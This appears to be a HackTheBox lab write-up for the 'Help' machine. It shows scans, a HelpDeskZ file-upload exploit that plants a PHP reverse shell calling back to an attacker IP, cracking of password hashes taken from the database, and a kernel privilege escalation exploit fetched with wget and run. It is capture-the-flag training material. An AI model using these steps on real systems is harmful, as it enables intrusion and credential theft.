Help
Contents
Ports scan
u505@kali:~/HTB/Machines/Help$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.121 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-17 20:07:44 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.121 Discovered open port 3000/tcp on 10.10.10.121 Discovered open port 80/tcp on 10.10.10.121
u505@kali:~/HTB/Machines/Help$ nmap -sC -sV 10.10.10.121 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:07 EST Nmap scan report for help.htb (10.10.10.121) Host is up (0.038s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA) | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA) |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.05 seconds
Web enumeration
u505@kali:~/HTB/Machines/Help$ python3 /opt/utils/dirsearch/dirsearch.py /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u http://help.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 10313
Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_15-11-25.log
Target: http://help.htb
[15:11:25] Starting: [15:11:26] 403 - 298B - /.ht_wsr.txt.txt [15:11:26] 403 - 295B - /.ht_wsr.txt/ [15:11:26] 403 - 291B - /.hta.txt [15:11:26] 403 - 288B - /.hta/ [15:11:26] 403 - 296B - /.htaccess.txt [15:11:26] 403 - 300B - /.htaccess-dev.txt [15:11:26] 403 - 297B - /.htaccess-dev/ [15:11:26] 403 - 302B - /.htaccess-local.txt [15:11:26] 403 - 299B - /.htaccess-local/ [15:11:26] 403 - 302B - /.htaccess-marco.txt [15:11:26] 403 - 299B - /.htaccess-marco/ [15:11:26] 403 - 300B - /.htaccess.BAK.txt [15:11:26] 403 - 297B - /.htaccess.BAK/ [15:11:26] 403 - 300B - /.htaccess.bak.txt [15:11:26] 403 - 297B - /.htaccess.bak/ [15:11:26] 403 - 301B - /.htaccess.bak1.txt [15:11:26] 403 - 298B - /.htaccess.bak1/ [15:11:26] 403 - 300B - /.htaccess.inc.txt [15:11:26] 403 - 297B - /.htaccess.inc/ [15:11:26] 403 - 297B - /.htaccess.old/ [15:11:26] 403 - 300B - /.htaccess.old.txt [15:11:26] 403 - 301B - /.htaccess.orig.txt [15:11:26] 403 - 298B - /.htaccess.orig/ [15:11:26] 403 - 303B - /.htaccess.sample.txt [15:11:26] 403 - 300B - /.htaccess.sample/ [15:11:26] 403 - 301B - /.htaccess.save.txt [15:11:26] 403 - 298B - /.htaccess.save/ [15:11:26] 403 - 300B - /.htaccess.txt.txt [15:11:26] 403 - 297B - /.htaccess.txt/ [15:11:26] 403 - 302B - /.htaccess_extra.txt [15:11:26] 403 - 299B - /.htaccess_extra/ [15:11:26] 403 - 301B - /.htaccess_orig.txt [15:11:26] 403 - 298B - /.htaccess_orig/ [15:11:26] 403 - 299B - /.htaccess_sc.txt [15:11:26] 403 - 296B - /.htaccess_sc/ [15:11:26] 403 - 299B - /.htaccessBAK.txt [15:11:26] 403 - 296B - /.htaccessBAK/ [15:11:26] 403 - 299B - /.htaccessOLD.txt [15:11:26] 403 - 296B - /.htaccessOLD/ [15:11:26] 403 - 300B - /.htaccessOLD2.txt [15:11:26] 403 - 297B - /.htaccessOLD2/ [15:11:26] 403 - 297B - /.htaccess~.txt [15:11:26] 403 - 294B - /.htaccess~/ [15:11:26] 403 - 295B - /.htgroup.txt [15:11:26] 403 - 292B - /.htgroup/ [15:11:26] 403 - 296B - /.htpasswd.txt [15:11:26] 403 - 300B - /.htpasswd-old.txt [15:11:26] 403 - 297B - /.htpasswd-old/ [15:11:26] 403 - 300B - /.htpasswd.bak.txt [15:11:26] 403 - 297B - /.htpasswd.bak/ [15:11:26] 403 - 300B - /.htpasswd.inc.txt [15:11:26] 403 - 297B - /.htpasswd.inc/ [15:11:26] 403 - 301B - /.htpasswd_test.txt [15:11:26] 403 - 297B - /.htpasswds.txt [15:11:26] 403 - 298B - /.htpasswd_test/ [15:11:27] 403 - 294B - /.htpasswds/ [15:11:27] 403 - 297B - /.htpasswrd.txt [15:11:27] 403 - 294B - /.htpasswrd/ [15:11:27] 403 - 295B - /.htusers.txt [15:11:27] 403 - 292B - /.htusers/ [15:11:44] 403 - 289B - /icons/ [15:11:45] 403 - 294B - /javascript/ [15:11:52] 403 - 297B - /server-status/ [15:11:54] 200 - 4KB - /support/
Task Completed
We run a dirsearch on support folder
u505@kali:~/HTB/Machines/Help$ python3 /opt/utils/dirsearch/dirsearch.py /usr/share/wordlists/dirb/common2.txt -e "txt,php" -f -t 50 -u http://help.htb/support/ _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 15266
Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_15-16-59.log
Target: http://help.htb/support/
[15:16:59] Starting: [15:17:01] 403 - 306B - /support/.ht_wsr.txt.txt [15:17:01] 403 - 306B - /support/.ht_wsr.txt.php [15:17:01] 403 - 303B - /support/.ht_wsr.txt/ [15:17:01] 403 - 299B - /support/.hta.txt [15:17:02] 403 - 299B - /support/.hta.php [15:17:02] 403 - 304B - /support/.htaccess.txt [15:17:02] 403 - 296B - /support/.hta/ [15:17:02] 403 - 304B - /support/.htaccess.php [15:17:02] 403 - 308B - /support/.htaccess-dev.txt [15:17:02] 403 - 308B - /support/.htaccess-dev.php [15:17:02] 403 - 305B - /support/.htaccess-dev/ [15:17:02] 403 - 307B - /support/.htaccess-local/ [15:17:02] 403 - 310B - /support/.htaccess-local.php [15:17:02] 403 - 310B - /support/.htaccess-local.txt [15:17:02] 403 - 310B - /support/.htaccess-marco.txt [15:17:02] 403 - 310B - /support/.htaccess-marco.php [15:17:02] 403 - 307B - /support/.htaccess-marco/ [15:17:02] 403 - 308B - /support/.htaccess.BAK.txt [15:17:02] 403 - 308B - /support/.htaccess.BAK.php [15:17:02] 403 - 305B - /support/.htaccess.BAK/ [15:17:02] 403 - 308B - /support/.htaccess.bak.txt [15:17:02] 403 - 308B - /support/.htaccess.bak.php [15:17:02] 403 - 305B - /support/.htaccess.bak/ [15:17:02] 403 - 309B - /support/.htaccess.bak1.txt [15:17:02] 403 - 309B - /support/.htaccess.bak1.php [15:17:02] 403 - 306B - /support/.htaccess.bak1/ [15:17:02] 403 - 308B - /support/.htaccess.inc.txt [15:17:02] 403 - 308B - /support/.htaccess.inc.php [15:17:02] 403 - 305B - /support/.htaccess.inc/ [15:17:02] 403 - 308B - /support/.htaccess.old.txt [15:17:02] 403 - 308B - /support/.htaccess.old.php [15:17:02] 403 - 305B - /support/.htaccess.old/ [15:17:02] 403 - 309B - /support/.htaccess.orig.txt [15:17:02] 403 - 309B - /support/.htaccess.orig.php [15:17:02] 403 - 306B - /support/.htaccess.orig/ [15:17:02] 403 - 311B - /support/.htaccess.sample.txt [15:17:02] 403 - 311B - /support/.htaccess.sample.php [15:17:02] 403 - 308B - /support/.htaccess.sample/ [15:17:02] 403 - 309B - /support/.htaccess.save.txt [15:17:02] 403 - 309B - /support/.htaccess.save.php [15:17:02] 403 - 306B - /support/.htaccess.save/ [15:17:02] 403 - 308B - /support/.htaccess.txt.txt [15:17:02] 403 - 308B - /support/.htaccess.txt.php [15:17:02] 403 - 305B - /support/.htaccess.txt/ [15:17:02] 403 - 310B - /support/.htaccess_extra.txt [15:17:02] 403 - 310B - /support/.htaccess_extra.php [15:17:02] 403 - 307B - /support/.htaccess_extra/ [15:17:02] 403 - 309B - /support/.htaccess_orig.txt [15:17:02] 403 - 309B - /support/.htaccess_orig.php [15:17:02] 403 - 306B - /support/.htaccess_orig/ [15:17:02] 403 - 307B - /support/.htaccess_sc.txt [15:17:02] 403 - 307B - /support/.htaccess_sc.php [15:17:02] 403 - 304B - /support/.htaccess_sc/ [15:17:02] 403 - 307B - /support/.htaccessBAK.txt [15:17:02] 403 - 307B - /support/.htaccessBAK.php [15:17:02] 403 - 304B - /support/.htaccessBAK/ [15:17:02] 403 - 307B - /support/.htaccessOLD.txt [15:17:02] 403 - 307B - /support/.htaccessOLD.php [15:17:02] 403 - 304B - /support/.htaccessOLD/ [15:17:02] 403 - 308B - /support/.htaccessOLD2.txt [15:17:02] 403 - 308B - /support/.htaccessOLD2.php [15:17:02] 403 - 305B - /support/.htaccessOLD2/ [15:17:02] 403 - 305B - /support/.htaccess~.txt [15:17:02] 403 - 305B - /support/.htaccess~.php [15:17:02] 403 - 302B - /support/.htaccess~/ [15:17:02] 403 - 303B - /support/.htgroup.txt [15:17:02] 403 - 300B - /support/.htgroup/ [15:17:02] 403 - 303B - /support/.htgroup.php [15:17:02] 403 - 304B - /support/.htpasswd.txt [15:17:02] 403 - 304B - /support/.htpasswd.php [15:17:02] 403 - 308B - /support/.htpasswd-old.txt [15:17:02] 403 - 308B - /support/.htpasswd-old.php [15:17:02] 403 - 305B - /support/.htpasswd-old/ [15:17:02] 403 - 308B - /support/.htpasswd.bak.txt [15:17:02] 403 - 308B - /support/.htpasswd.bak.php [15:17:02] 403 - 305B - /support/.htpasswd.bak/ [15:17:02] 403 - 308B - /support/.htpasswd.inc.txt [15:17:02] 403 - 308B - /support/.htpasswd.inc.php [15:17:02] 403 - 305B - /support/.htpasswd.inc/ [15:17:02] 403 - 309B - /support/.htpasswd_test.txt [15:17:02] 403 - 309B - /support/.htpasswd_test.php [15:17:02] 403 - 306B - /support/.htpasswd_test/ [15:17:02] 403 - 305B - /support/.htpasswds.txt [15:17:02] 403 - 305B - /support/.htpasswds.php [15:17:02] 403 - 302B - /support/.htpasswds/ [15:17:02] 403 - 305B - /support/.htpasswrd.txt [15:17:02] 403 - 305B - /support/.htpasswrd.php [15:17:02] 403 - 302B - /support/.htpasswrd/ [15:17:02] 403 - 303B - /support/.htusers.txt [15:17:02] 403 - 303B - /support/.htusers.php [15:17:02] 403 - 300B - /support/.htusers/ [15:17:25] 200 - 0B - /support/css/ [15:17:33] 200 - 0B - /support/images/ [15:17:33] 302 - 0B - /support/includes/ -> / [15:17:33] 200 - 4KB - /support/index.php [15:17:34] 200 - 4KB - /support/index.php/ [15:17:34] 200 - 4KB - /support/index.php/login/ [15:17:35] 302 - 0B - /support/js/ -> / [15:17:35] 302 - 0B - /support/js/tinymce/ -> / [15:17:36] 200 - 18KB - /support/LICENSE.txt [15:17:53] 302 - 0B - /support/uploads/ -> /
Task Completed
Helpdeskz Vulnerability
u505@kali:~/HTB/Machines/Help$ searchsploit helpdeskz ---------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ---------------------------------------------------------------- ---------------------------------------- HelpDeskZ 1.0.2 - Arbitrary File Upload | exploits/php/webapps/40300.py HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorize | exploits/php/webapps/41200.py ---------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result u505@kali:~/HTB/Machines/Help$ searchsploit -m 40300 Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload URL: https://www.exploit-db.com/exploits/40300 Path: /usr/share/exploitdb/exploits/php/webapps/40300.py File Type: troff or preprocessor input, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Help/40300.py
Download the source code
The application is opensource.
u505@kali:~/HTB/Machines/Help/helpdeskzcode$ wget https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip u505@kali:~/HTB/Machines/Help/helpdeskzcode$ unzip master.zip
If we read the code used by the exploit, we see that the file name is calculated as an md5 of the name of the file and the time of the upload. The file is uploaded, and after the extension is verified, but if the extension is not allowed, nothing is done except printing the error message.
u505@kali:~/HTB/Machines/Help/helpdeskzcode/HelpDeskZ-1.0-master$ vi +39 controllers/view_tickets_controller.php if($settings['ticket_attachment'] == 1){ $uploaddir = UPLOAD_DIR.'tickets/'; if($_FILES['attachment']['error'] == 0){ $ext = pathinfo($_FILES['attachment']['name'], PATHINFO_EXTENSION); $filename = md5($_FILES['attachment']['name'].time()).".".$ext; $fileuploaded = array('name' => $_FILES['attachment']['name'], 'enc' => $filename, 'size' => formatBytes($_FILES['attachment']['size']), 'filetype' => $_FILES['attachment']['type']); $uploadedfile = $uploaddir.$filename; if (!move_uploaded_file($_FILES['attachment']['tmp_name'], $uploadedfile)) { $show_error = true; $error_msg = $LANG['ERROR_UPLOADING_A_FILE']; }else{ $fileverification = verifyAttachment($_FILES['attachment']); switch($fileverification['msg_code']){ case '1': $show_error = true; $error_msg = $LANG['INVALID_FILE_EXTENSION']; break; case '2': $show_error = true; $error_msg = $LANG['FILE_NOT_ALLOWED']; break; case '3': $show_error = true; $error_msg = str_replace("%size%", $fileverification['msg_extra'], $LANG['FILE_IS_BIG']); break; } } } }
The exploit consist to upload a php reverse shell, and after the exploit "guess" the name of the file and call it.
Prepare the reverse shell
u505@kali:~/HTB/Machines/Help$ cp /usr/share/webshells/php/php-reverse-shell.php ./ u505@kali:~/HTB/Machines/Help$ vi php-reverse-shell.php u505@kali:~/HTB/Machines/Help$ grep CHANGE php-reverse-shell.php $ip = '10.10.14.26'; // CHANGE THIS $port = 4444; // CHANGE THIS
We raise the listener
u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Upload the reverse shell
Run the exploit to find the URL
u505@kali:~/HTB/Machines/Help$ python exploit.py http://10.10.10.121/support/uploads/tickets/ php-reverse-shell.php Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
The exploit stalled but a reverse shell is opened.
u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.121. Ncat: Connection from 10.10.10.121:55930. Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 13:02:24 up 1:15, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare) /bin/sh: 0: can't access tty; job control turned off $ exit
When we get out th e reverse shell the exploit give us the URL, to reuse it if needed.
u505@kali:~/HTB/Machines/Help$ python exploit.py http://10.10.10.121/support/uploads/tickets/ php-reverse-shell.php Helpdeskz v1.0.2 - Unauthenticated shell upload exploit found! http://10.10.10.121/support/uploads/tickets/b76aa37ba0ec2d78e6b48dc121693d47.php
User flag
u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
We open the reverse shell
u505@kali:~/HTB/Machines/Help$ curl http://10.10.10.121/support/uploads/tickets/b76aa37ba0ec2d78e6b48dc121693d47.php
From the listener
u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.121. Ncat: Connection from 10.10.10.121:55932. Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 13:07:24 up 1:20, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" help@help:/$ stty raw -echo stty raw -echo help@help:/$ cat /home/help/user.txt <USER_FLAG>
User recon
help@help:/home/help$ cat .bash_history sudo mkdir lol ls -la cat .bash_history rm -rf .bash_history touch .bash_history ls -la su su rOOTmEoRdIE su MS' exit / al ; ` \ ' su cd help cd /help cd src ls cd graphql ls cd schema/ ls cd resolvers/ ls cat index.js cd cd help ls npm run build reboot sudo shutdown
File /home/help/help/src/graphql/schema/resolvers/index.js
help@help:/home/help/help$ cat src/graphql/schema/resolvers/index.js
const user = { username:'helpme@helpme.com', password:'5d3c93182bb20f07b994a7f617e99cff' }
const resolvers = {
Query: {
user () {
return user
}
}
}
We brute force this hash
u505@kali:~/HTB/Machines/Help$ cat hash.txt
5d3c93182bb20f07b994a7f617e99cff
u505@kali:~/HTB/Machines/Help$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Help$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz
Database
help@help:/var/www/html/support/includes$ cat config.php cat config.php <?php $config['Database']['dbname'] = 'support'; $config['Database']['tableprefix'] = ; $config['Database']['servername'] = 'localhost'; $config['Database']['username'] = 'root'; $config['Database']['password'] = 'helpme'; $config['Database']['type'] = 'mysqli'; ?>
As usual the database is accessed with the user root.
help@help:/var/www/html/support/includes$ mysql -p -u root Enter password: helpme
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 20 Server version: 5.7.24-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | support | | sys | +--------------------+ 5 rows in set (0.00 sec)
mysql> use support use support Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from users; select * from users; +----+------------+----------+-----------------------+------------------------------------------+------------------+--------+ | id | salutation | fullname | email | password | timezone | status | +----+------------+----------+-----------------------+------------------------------------------+------------------+--------+ | 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 | | 2 | 0 | xcvxv | lolololol@yopmail.com | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL | 1 | +----+------------+----------+-----------------------+------------------------------------------+------------------+--------+ 2 rows in set (0.00 sec)
mysql> select * from staff\G select * from staff\G *************************** 1. row *************************** id: 1 username: admin password: d318f44739dced66793b1a603028133a76ae680e fullname: Administrator email: support@mysite.com login: 1547216217 last_login: 1543429746 department: a:1:{i:0;s:1:"1";} timezone: signature: Best regards, Administrator newticket_notification: 0 avatar: NULL admin: 1 status: Enable 1 row in set (0.00 sec)
These hash are sha1
u505@kali:~/HTB/Machines/Help$ cat hash2.txt
ec09fa0d0ba74336ea7fe392869adb198242f15a
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca
d318f44739dced66793b1a603028133a76ae680e
u505@kali:~/HTB/Machines/Help$ hashcat -m 100 hash2.txt hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Help$ hashcat -m 100 hash2.txt hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
d318f44739dced66793b1a603028133a76ae680e:Welcome1
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:godhelpmeplz
After a few test, Welcome1 is the password of user help.
u505@kali:~/HTB/Machines/Help$ ssh help@help The authenticity of host 'help (10.10.10.121)' can't be established. ECDSA key fingerprint is SHA256:hObUCDbNmiPilZ/0rchuxdSfRB7uSKrmk/4TjE5nCnk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'help,10.10.10.121' (ECDSA) to the list of known hosts. help@help's password: Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-116-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage You have new mail. Last login: Fri Jan 11 06:18:50 2019 help@help:~$ sudo -l [sudo] password for help: Sorry, user help may not run sudo on help.
We have the password of the user help, but it does not provide more help that the reverse shell.
Privileges escalation
help@help:~$ uname -a Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
The kernel 4.4.0-116 has a known vulnerability
u505@kali:~/HTB/Machines/Help$ searchsploit 4.4.0-116 ---------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ---------------------------------------------------------------- ---------------------------------------- Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Esc | exploits/linux/local/44298.c ---------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result u505@kali:~/HTB/Machines/Help$ cd www/ u505@kali:~/HTB/Machines/Help/www$ searchsploit -m 44298 Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation URL: https://www.exploit-db.com/exploits/44298 Path: /usr/share/exploitdb/exploits/linux/local/44298.c File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Help/www/44298.c u505@kali:~/HTB/Machines/Help/www$ head 44298.c /* * Ubuntu 16.04.4 kernel priv esc * * all credits to @bleidl * - vnik */ // Tested on: // 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 // if different kernel adjust CRED offset + check kernel stack size u505@kali:~/HTB/Machines/Help/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target
help@help:~$ wget -q http://10.10.14.26/44298.c help@help:~$ gcc 44298.c -o 44298 help@help:~$ ./44298 task_struct = ffff880036795400 uidptr = ffff88003684c844 spawning root shell root@help:~# whoami root root@help:~# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 19:03, 17 February 2020 (EST)